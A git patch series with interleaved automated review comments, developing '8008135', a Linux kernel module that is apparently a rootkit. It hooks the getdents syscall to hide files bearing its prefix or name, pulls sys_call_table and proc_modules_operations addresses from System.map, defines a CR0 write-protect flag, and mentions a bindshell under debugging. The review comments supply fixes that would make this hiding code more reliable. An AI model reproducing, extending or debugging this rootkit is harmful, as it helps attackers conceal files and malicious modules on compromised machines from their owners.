From 15b13a399a3dbef2e6a484817308f731e10fc8b9 Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Mon, 18 Nov 2019 11:22:34 +0100 Subject: [PATCH 1/5] Adding gitignore --- .gitignore | 6 ++++++ 1 file changed, 6 insertions(+) create mode 100644 .gitignore diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..07ec48c --- /dev/null +++ b/.gitignore @@ -0,0 +1,6 @@ +*.anjuta* +*.out +*.a +*.ko +*.o +*.*~ From 48717aa477cafa0da6abe58e5eff91842ee0b057 Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Mon, 18 Nov 2019 11:27:29 +0100 Subject: [PATCH 2/5] Updated gitignore --- .gitignore | 1 + 1 file changed, 1 insertion(+) diff --git a/.gitignore b/.gitignore index 07ec48c..98b2346 100644 --- a/.gitignore +++ b/.gitignore @@ -4,3 +4,4 @@ *.ko *.o *.*~ +8008135 From 85eb771fa527e2760492f087cce007a504ae36be Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Tue, 19 Nov 2019 15:20:53 +0100 Subject: [PATCH 3/5] Update Makefile, Adding more fileext to .gitignorey --- .gitignore | 12 ++++++++++-- 8008135.c | 47 ++++++++++++++++++++++++++++++++++++++++++----- Makefile | 31 +++++-------------------------- 3 files changed, 57 insertions(+), 33 deletions(-) diff --git a/.gitignore b/.gitignore index 98b2346..364a1fd 100644 --- a/.gitignore +++ b/.gitignore @@ -1,7 +1,15 @@ + *.anjuta* + +*.mod.* +8008135 *.out *.a *.ko *.o -*.*~ -8008135 + +*~ +*.symvers +*.order +.tmp_versions/ +*.cmd diff --git a/8008135.c b/8008135.c index ac6725b..1778941 100644 --- a/8008135.c +++ b/8008135.c 
@@ -17,10 +17,47 @@ * with this program. If not, see . */ -#include -int main() -{ - printf("Hello world\n"); - return (0); +/**** Includes *************************************************************** +*******************************************************************************/ +#include +#include +#include + + +/**** Modinfo **************************************************************** +*******************************************************************************/ + +MODULE_LICENSE("GPLv3"); +MODULE_AUTHOR("JanKoernerEnterprises"); +MODULE_DESCRIPTION("8008135"); +MODULE_VERSION("0.1"); + +/**** var ******************************************************************** +*******************************************************************************/ +static char *name = "8008135"; + + +/*** FUNCTION **************************************************************** +* NAME: init_8008135 +* DESCRIPTION: initializing Kernel Module +* PARAMETERS: - +* RETURNS: int +*******************************************************************************/ +static int __init init_8008135(void) { + printk(KERN_INFO "Loading %s into Kernel", name); + return 0; +} + +/*** FUNCTION **************************************************************** +* NAME: exit_8008135 +* DESCRIPTION: unloading Kernel Module +* PARAMETERS: - +* RETURNS: - +*******************************************************************************/ +static void __exit exit_8008135(void) { + printk(KERN_INFO "Unloading %s from Kernel", name); } +// Setting pointers to init-/exit-functions +module_init(init_8008135); +module_exit(exit_8008135); diff --git a/Makefile b/Makefile index dad9fa4..a5507a8 100644 --- a/Makefile +++ b/Makefile 
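Review bot: `MODULE_LICENSE("GPLv3")` is not one of the license strings the module loader recognizes (`"GPL"`, `"GPL v2"`, `"Dual BSD/GPL"` and the few others listed in include/linux/module.h), so loading this module taints the kernel with the proprietary flag and the module is treated as GPL-incompatible, which refuses it any EXPORT_SYMBOL_GPL symbol it may later need; `MODULE_LICENSE("GPL");` is the string the kernel uses for GPL v2-or-later code, subject to what the project's own license header permits. Both `printk` calls in init_8008135 and exit_8008135 lack a trailing `\n`, so the next message can be appended to the same log line or held back until a newline arrives — `printk(KERN_INFO "Loading %s into Kernel\n", name);` and likewise for the unload message.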
@@ -1,30 +1,9 @@ +obj-m+=8008135.o -## Created by Anjuta - -CC = gcc -CFLAGS = -g -Wall -OBJECTS = 8008135.o -INCFLAGS = -LDFLAGS = -Wl,-rpath,/usr/local/lib -LIBS = - -all: 8008135 - -8008135: $(OBJECTS) - $(CC) -o 8008135 $(OBJECTS) $(LDFLAGS) $(LIBS) - -.SUFFIXES: -.SUFFIXES: .c .cc .C .cpp .o - -.c.o : - $(CC) -o $@ -c $(CFLAGS) $< $(INCFLAGS) - -count: - wc *.c *.cc *.C *.cpp *.h *.hpp +all: + make -C /lib/modules/$(shell uname -r)/build/ M=$(PWD) modules clean: - rm -f *.o + make -C /lib/modules/$(shell uname -r)/build/ M=$(PWD) clean + -.PHONY: all -.PHONY: count -.PHONY: clean From 27b3fe226be62ae92706cacd32b6d842f0f3c941 Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Thu, 21 Nov 2019 03:00:44 +0100 Subject: [PATCH 4/5] Adding eclipse file extensions to gitignore --- .gitignore | 4 ++- 8008135.anjuta | 37 ------------------------ 8008135.c => src/8008135.c | 0 create_sysgen.sh => src/create_sysgen.sh | 0 4 files changed, 3 insertions(+), 38 deletions(-) delete mode 100644 8008135.anjuta rename 8008135.c => src/8008135.c (100%) rename create_sysgen.sh => src/create_sysgen.sh (100%) diff --git a/.gitignore b/.gitignore index be19253..99252c1 100644 --- a/.gitignore +++ b/.gitignore @@ -1,6 +1,8 @@ sysgen.h *.anjuta* - +*.*project +*.settings +*.ur-safe *.mod.* 8008135 *.out diff --git a/8008135.anjuta b/8008135.anjuta deleted file mode 100644 index 390fe09..0000000 --- a/8008135.anjuta +++ /dev/null @@ -1,37 +0,0 @@ - - - - - - - - - - - - - - - - - diff --git a/8008135.c b/src/8008135.c similarity index 100% rename from 8008135.c rename to src/8008135.c diff --git a/create_sysgen.sh b/src/create_sysgen.sh similarity index 100% rename from create_sysgen.sh rename to src/create_sysgen.sh From 062fdebeaec7689a4c65cb2e4068e3f0e56eafde Mon Sep 17 00:00:00 2001 
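Review bot: The rewrite drops the `.PHONY` declarations for `all` and `clean`, so a file or directory named `all` or `clean` in the checkout makes make report the target up to date and skip the kbuild invocation entirely; keep `.PHONY: all clean`. The recursive invocation uses a bare `make` rather than `$(MAKE)`, which loses the parent's command-line flags and jobserver — `$(MAKE) -C /lib/modules/$(shell uname -r)/build/ M=$(PWD) modules`, and the same for `clean`.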
From: Valentin Lechner Date: Thu, 21 Nov 2019 03:02:37 +0100 Subject: [PATCH 5/5] Changing Folder Structures and extending the Makefile for Needs Added an 'src' dir with subfolders headers, include, libs Extending Makefile, so that all the Files get included for the build. Also adding the "load" option for make, which loads the module (has to be built before) as well as the "unload" option which unloads the module. The "all" option now automatically builds the sysgen.h from the script, it doesn't have to be executed in forehand anymore. Also, some Variables got added for better readability and changeability. After the socket bindshell didnt work so far, I added some DEBUG Kernel prints to debug the issue that sometimes the files to be hidden get displayed as "?" Also, a few Functions for debugging have been added - but I was too tired to add them to the collection and use them instead of ```printk``` --- Makefile | 40 ++++++++++++++++++--- src/8008135.c | 71 +++++++++++-------------------------- src/create_sysgen.sh | 15 +++++--- src/headers/8008135.h | 66 ++++++++++++++++++++++++++++++++++ src/include/headers/utils.h | 43 ++++++++++++++++++++++ 5 files changed, 176 insertions(+), 59 deletions(-) create mode 100644 src/headers/8008135.h create mode 100644 src/include/headers/utils.h diff --git a/Makefile b/Makefile index c9e395d..b18503c 100644 --- a/Makefile +++ b/Makefile 
@@ -1,6 +1,38 @@ -obj-m += 8008135.o +# Module name +MNAME := 8008135 -modules: - make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules +# Build +MODULEDIR := /lib/modules/$(shell uname -r) +BUILDDIR := $(MODULEDIR)/build +KERNELDIR := $(MODULEDIR)/kernel + +# Source files +SRCS_S := src +LIBS_S := src/libs +INCL_S := src/include + +# Header files +SRCS_H := $(PWD)/$(SRCS_S)/headers +LIBS_H := $(PWD)/$(LIBS_S)/headers +INCL_H := $(PWD)/$(INCL_S)/headers + +obj-m += $(MNAME).o +# Core +$(MNAME)-y += src/$(MNAME).o + +# Includes for header files etc +ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H) + +all: + $(shell $(SRCS_S)/create_sysgen.sh) + $(MAKE) -C $(BUILDDIR) M=$(PWD) modules + +load: + insmod $(MNAME).ko + +unload: + rmmod $(MNAME) + clean: - make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean + -rm $(SRCS_H)/sysgen.h + $(MAKE) -C $(BUILDDIR) M=$(PWD) clean diff --git a/src/8008135.c b/src/8008135.c index 97b67e4..cf253f5 100644 --- a/src/8008135.c +++ b/src/8008135.c 
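Review bot: `$(shell $(SRCS_S)/create_sysgen.sh)` in the `all` recipe runs the script while make expands the recipe, substitutes its stdout into the command line and discards its exit status: the script's `exit 2` when System.map has no sys_call_table entry is ignored, and its "No SysCall Table Value ..." message becomes the recipe line that make then tries to execute as a command. Run it as an ordinary recipe line, `$(SRCS_S)/create_sysgen.sh`, so a non-zero exit stops the build before kbuild is invoked. None of `all`, `load`, `unload` or `clean` is declared phony; add `.PHONY: all load unload clean`. `KERNELDIR` is defined but not used anywhere in this hunk.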
@@ -17,50 +17,9 @@ * with this program. If not, see . */ -/**** Includes *************************************************************** +/**** includes ***************************************************************** *******************************************************************************/ -#include -#include -#include -#include -#include -#include -#include "sysgen.h" - - -/**** Defines ***************************************************************** -*******************************************************************************/ - -#define GETDENTS_SYSCALL_NUM 78 -#define WRITE_PROTECT_FLAG (1<<16) - -#define HIDE_PREFIX "8008135." -#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1) - -#define MODULE_NAME "8008135" -#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1) - -/**** Modinfo **************************************************************** -*******************************************************************************/ - -MODULE_LICENSE("GPLv3"); -MODULE_AUTHOR("JanKoernerEnterprises"); -MODULE_DESCRIPTION("8008135"); -MODULE_VERSION("0.1"); - -/**** type ******************************************************************* -*******************************************************************************/ -struct linux_dirent { - unsigned long d_ino; - unsigned long d_off; - unsigned short d_reclen; // d_reclen is the way to tell the length of this entry - char d_name[1]; // the struct value is actually longer than this, and d_name is variable width. -}; - -typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, - struct linux_dirent __user *dirent, - unsigned int count); - +#include "8008135.h" /**** var ******************************************************************** *******************************************************************************/ 
@@ -72,8 +31,8 @@ sys_getdents_t sys_getdents_orig = NULL; * PARAMETERS: - * RETURNS: - *******************************************************************************/ -asmlinkage long sys_getdents_new(unsigned int fd, - struct linux_dirent __user *dirent, +asmlinkage long sys_getdents_new(unsigned int fd, + struct linux_dirent __user *dirent, unsigned int count) { int boff; struct linux_dirent* ent; @@ -85,7 +44,7 @@ asmlinkage long sys_getdents_new(unsigned int fd, if (ret <= 0) { return ret; } - + dbuf = (char*)dirent; // go through the entries, looking for one that has our prefix @@ -96,12 +55,25 @@ asmlinkage long sys_getdents_new(unsigned int fd, // if it has hide prefix or module name anywhere, hide it if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) || (strstr(ent->d_name, MODULE_NAME) != NULL)) { - +#if defined DEBUG + printk("\n hide prefix or mod name contained!\n"); + printk("\n ret %ld\n ", ret); + printk("\n dbuf %d\n" , dbuf); + printk("\n"); + printk(ent->d_name); +#endif // remove this entry by copying everything after it forward // and adjust the length reported - memcpy(dbuf + boff, dbuf + boff + ent->d_reclen, - ret - (boff + ent->d_reclen)); +#if defined DEBUG + printk("\n reclen %u \n", ent->d_reclen); +#endif + memcpy(dbuf + boff, + dbuf + boff + ent->d_reclen, + ret - (boff + ent->d_reclen)); ret -= ent->d_reclen; +#if defined DEBUG + printk("\n ret after change %ld\n ", ret); +#endif } else { // on to the next entry boff += ent->d_reclen; @@ -155,7 +127,6 @@ static void __exit exit_8008135(void) { printk(KERN_INFO "Old syscall back\n"); } - // Setting pointers to init-/exit-functions module_init(init_8008135); module_exit(exit_8008135); diff --git a/src/create_sysgen.sh b/src/create_sysgen.sh index 7892adf..50c4126 100755 --- a/src/create_sysgen.sh +++ b/src/create_sysgen.sh 
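Review bot: `printk(ent->d_name)` in the new DEBUG block uses a directory entry name as the format string; the name is chosen by whoever created the file, so an entry such as `8008135.%s%s%s` is parsed for conversions by the kernel's vsnprintf and dereferences argument slots that were never passed — it must be `printk("%s\n", ent->d_name);`. The same block prints a `char *` with `%d` (`printk("\n dbuf %d\n", dbuf)`), a type mismatch that -Wformat flags and that truncates the pointer; use `%px` or drop the line. The re-wrapped `memcpy` copies between overlapping ranges of the same buffer (`dbuf + boff` and `dbuf + boff + ent->d_reclen`), for which only `memmove` has defined behaviour. Note also that `ent->d_reclen` is read straight from the `__user` buffer and a zero value never advances `boff`, so the loop would not terminate. sys_getdents_new begins and ends outside this hunk.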
@@ -1,14 +1,19 @@ -#!/bin/bash +#!/usr/bin/env bash +SCRIPTPATH="$( cd "$(dirname "$0")" ; pwd -P )" +SRCS_H="$SCRIPTPATH""/headers" +SGENH="$SRCS_H""/sysgen.h" + smap="/boot/System.map-$(uname -r)" -echo -e "#pragma once" > ./sysgen.h -echo -e "#include " >> ./sysgen.h +echo -e "#pragma once" > "$SGENH" +echo -e "#include " >> "$SGENH" symbline=$(cat $smap | grep '\Wsys_call_table$') set $symbline -echo -e "void** sys_call_table = (void**)0x$1;" >> ./sysgen.h +[ -z "$symbline" ] && echo "No SysCall Table Value from System.map found" && exit 2; +echo -e "void** sys_call_table = (void**)0x$1;" >> "$SGENH" procline=$(cat $smap | grep '\Wproc_modules_operations$') set $procline -echo -e "struct file_operations* proc_modules_operations = (struct file_operations*)0x$1;" >> ./sysgen.h +echo -e "struct file_operations* proc_modules_operations = (struct file_operations*)0x$1;" >> "$SGENH" \ No newline at end of file diff --git a/src/headers/8008135.h b/src/headers/8008135.h new file mode 100644 index 0000000..82df99e --- /dev/null +++ b/src/headers/8008135.h 
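Review bot: The emptiness check added for `$symbline` has no counterpart for the second lookup: if `proc_modules_operations` is absent from System.map, `set $procline` with an empty string leaves the positional parameters untouched, so `$1` is still the sys_call_table address and the generated header silently assigns it to `proc_modules_operations`. Add `[ -z "$procline" ] && echo "No proc_modules_operations in System.map" && exit 2` before that `set`. `$smap` is unquoted in both `cat $smap` lines and the file is normally root-readable only, so a non-root run produces an empty match that the first check now catches but the second does not. System.map records link-time addresses; on a kernel booted with KASLR the runtime addresses differ, so the generated constants cannot be assumed valid — at minimum the header should record the release it was generated for, e.g. `echo "/* generated from $smap */" >> "$SGENH"`.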
@@ -0,0 +1,66 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ +#ifndef SRC_HEADERS_8008135_H +#define SRC_HEADERS_8008135_H +/**** Includes *************************************************************** +*******************************************************************************/ +#include +#include +#include +#include +#include +#include +#include "sysgen.h" + + +/**** Defines ***************************************************************** +*******************************************************************************/ + +#define GETDENTS_SYSCALL_NUM 78 +#define WRITE_PROTECT_FLAG (1<<16) + +#define HIDE_PREFIX "8008135." 
+#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1) + +#define MODULE_NAME "8008135" +#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1) + +/**** Modinfo **************************************************************** +*******************************************************************************/ + +MODULE_LICENSE("GPLv3"); +MODULE_AUTHOR("JanKoernerEnterprises"); +MODULE_DESCRIPTION("8008135"); +MODULE_VERSION("0.1"); + +/**** type ******************************************************************* +*******************************************************************************/ +struct linux_dirent { + unsigned long d_ino; + unsigned long d_off; + unsigned short d_reclen; // d_reclen is the way to tell the length of this entry + char d_name[1]; // the struct value is actually longer than this, and d_name is variable width. +}; + +typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, + struct linux_dirent __user *dirent, + unsigned int count); + + +#endif /* SRC_HEADERS_8008135_H */ diff --git a/src/include/headers/utils.h b/src/include/headers/utils.h new file mode 100644 index 0000000..f29fac2 --- /dev/null +++ b/src/include/headers/utils.h 
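Review bot: `#include "sysgen.h"` now lives in a header, and create_sysgen.sh emits that file as definitions (`void** sys_call_table = (void**)0x...;`), so a second translation unit added under `$(MNAME)-y` that includes 8008135.h would fail to link with duplicate symbols; have the script emit `static` (or `extern` declarations with one definition in 8008135.c). `GETDENTS_SYSCALL_NUM 78` is the x86-64 number only (i386 uses 141); if the kernel's unistd headers are in scope, `#define GETDENTS_SYSCALL_NUM __NR_getdents` follows the target architecture. `WRITE_PROTECT_FLAG (1<<16)` deserves a comment naming the bit, e.g. `/* CR0.WP on x86: clear to write read-only pages */`. The `MODULE_*` tags placed in a shared header would presumably be emitted once per including object; they belong in the single .c that defines the module.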
@@ -0,0 +1,43 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +/**** Debugging *************************************************************** +*******************************************************************************/ + +#ifndef SRC_INCLUDE__HEADERS_UTILS_H_ +#define SRC_INCLUDE_HEADERS_UTILS_H_ +#define DEBUG_ENABLED 1 + +/**** Debugging *************************************************************** +*******************************************************************************/ + +/* variadic macro for debug messages */ +#define debug(str, ...) \ +if (DEBUG_ENABLED) { \ + pr_info("[ 8008135 ] [ %s ] " str "\n", \ + __func__, ##__VA_ARGS__); \ +} + +#define alert(str, ...) \ +if (DEBUG_ENABLED) { \ + pr_warn("[ 8008135 ] [ %s ] " str "\n", \ + __func__, ##__VA_ARGS__); \ +} + +#endif /* SRC_INCLUDE_HEADERS_UTILS_H_ */
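Review bot: The include guard never engages: the test is `#ifndef SRC_INCLUDE__HEADERS_UTILS_H_` (double underscore) but the macro defined is `SRC_INCLUDE_HEADERS_UTILS_H_`, so every inclusion re-expands the file. Both `debug` and `alert` expand to a bare `if (DEBUG_ENABLED) { ... }`, so `if (x) debug("..."); else ...` binds the `else` to the macro's `if` and the trailing `;` after a call is an empty statement; the kernel convention is `do { ... } while (0)`. `DEBUG_ENABLED` is hard-wired to `1` in the header while 8008135.c keys its own prints on `#if defined DEBUG`, so there are two switches and one of them is always on; making the define overridable lets `ccflags-y += -DDEBUG_ENABLED=0` turn it off. The rewrite below fixes the guard name and macro shape and keeps the current default.

```c
#ifndef SRC_INCLUDE_HEADERS_UTILS_H_
#define SRC_INCLUDE_HEADERS_UTILS_H_

/* Compile-time switch for the debug()/alert() helpers; override with -DDEBUG_ENABLED=0 */
#ifndef DEBUG_ENABLED
#define DEBUG_ENABLED 1
#endif

/* variadic macros for debug messages; do/while(0) makes them safe as single statements */
#define debug(str, ...) do { \
	if (DEBUG_ENABLED) \
		pr_info("[ 8008135 ] [ %s ] " str "\n", __func__, ##__VA_ARGS__); \
} while (0)

#define alert(str, ...) do { \
	if (DEBUG_ENABLED) \
		pr_warn("[ 8008135 ] [ %s ] " str "\n", __func__, ##__VA_ARGS__); \
} while (0)

#endif /* SRC_INCLUDE_HEADERS_UTILS_H_ */
```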